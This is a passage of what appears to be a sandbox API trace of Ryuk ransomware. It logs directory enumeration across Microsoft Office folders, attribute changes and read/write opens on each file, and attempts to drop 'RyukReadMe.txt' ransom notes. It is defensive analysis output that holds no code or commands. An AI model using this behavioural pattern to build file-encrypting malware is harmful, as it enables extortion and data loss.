lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML", dwFileAttributes=0x80) returned 0 [0137.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\olkirm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.463] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.463] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML", dwFileAttributes=0x80) returned 0 [0137.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\olkirmv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OMML2MML.XSL", dwFileAttributes=0x80) returned 0 [0137.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OMML2MML.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\omml2mml.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.464] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.465] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.465] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.465] SetLastError (dwErrCode=0x0) [0137.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.465] GetLastError () returned 0x5 [0137.465] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.465] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.497] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.497] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml", dwFileAttributes=0x80) returned 0 [0137.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote-pipelineconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.498] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.499] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.499] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.499] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote.gpd", dwFileAttributes=0x80) returned 0 [0137.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote.gpd" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote.gpd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.500] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.500] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.500] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendtoOneNoteFilter.gpd", dwFileAttributes=0x80) returned 0 [0137.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendtoOneNoteFilter.gpd" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenotefilter.gpd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.500] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNoteNames.gpd", dwFileAttributes=0x80) returned 0 [0137.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNoteNames.gpd" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenotenames.gpd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.501] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.501] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.502] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.502] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.502] SetLastError (dwErrCode=0x0) [0137.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.505] GetLastError () returned 0x5 [0137.505] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.505] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.505] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.505] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.505] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML", dwFileAttributes=0x80) returned 0 [0137.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\onenoteirm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ORMMODEL.MDL", dwFileAttributes=0x80) returned 0 [0137.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ORMMODEL.MDL" (normalized: "c:\\program files\\microsoft office\\office14\\ormmodel.mdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.507] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.507] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OSPP.HTM", dwFileAttributes=0x80) returned 0 [0137.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.508] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.508] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OSPP.VBS", dwFileAttributes=0x80) returned 0 [0137.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office14\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.508] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.508] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.508] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.508] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OUTLFLTR.DAT", dwFileAttributes=0x80) returned 0 [0137.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OUTLFLTR.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\outlfltr.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.509] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.509] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.509] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.509] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.509] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.509] SetLastError (dwErrCode=0x0) [0137.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.509] GetLastError () returned 0x5 [0137.509] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.509] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.511] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.512] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.512] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML", dwFileAttributes=0x80) returned 0 [0137.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\ameritech.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.513] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML", dwFileAttributes=0x80) returned 0 [0137.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btinternet.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.513] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML", dwFileAttributes=0x80) returned 0 [0137.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btopenworld.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.514] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML", dwFileAttributes=0x80) returned 0 [0137.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\flash.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.515] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.515] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML", dwFileAttributes=0x80) returned 0 [0137.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nl.rogers.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.516] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML", dwFileAttributes=0x80) returned 0 [0137.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nvbell.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.516] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML", dwFileAttributes=0x80) returned 0 [0137.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\pacbell.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.517] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML", dwFileAttributes=0x80) returned 0 [0137.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\prodigy.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.517] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML", dwFileAttributes=0x80) returned 0 [0137.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\rogers.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.518] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.518] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML", dwFileAttributes=0x80) returned 0 [0137.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\sbcglobal.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.518] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.518] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.519] SetFileAttributesW (lpFileName="C:\\Program 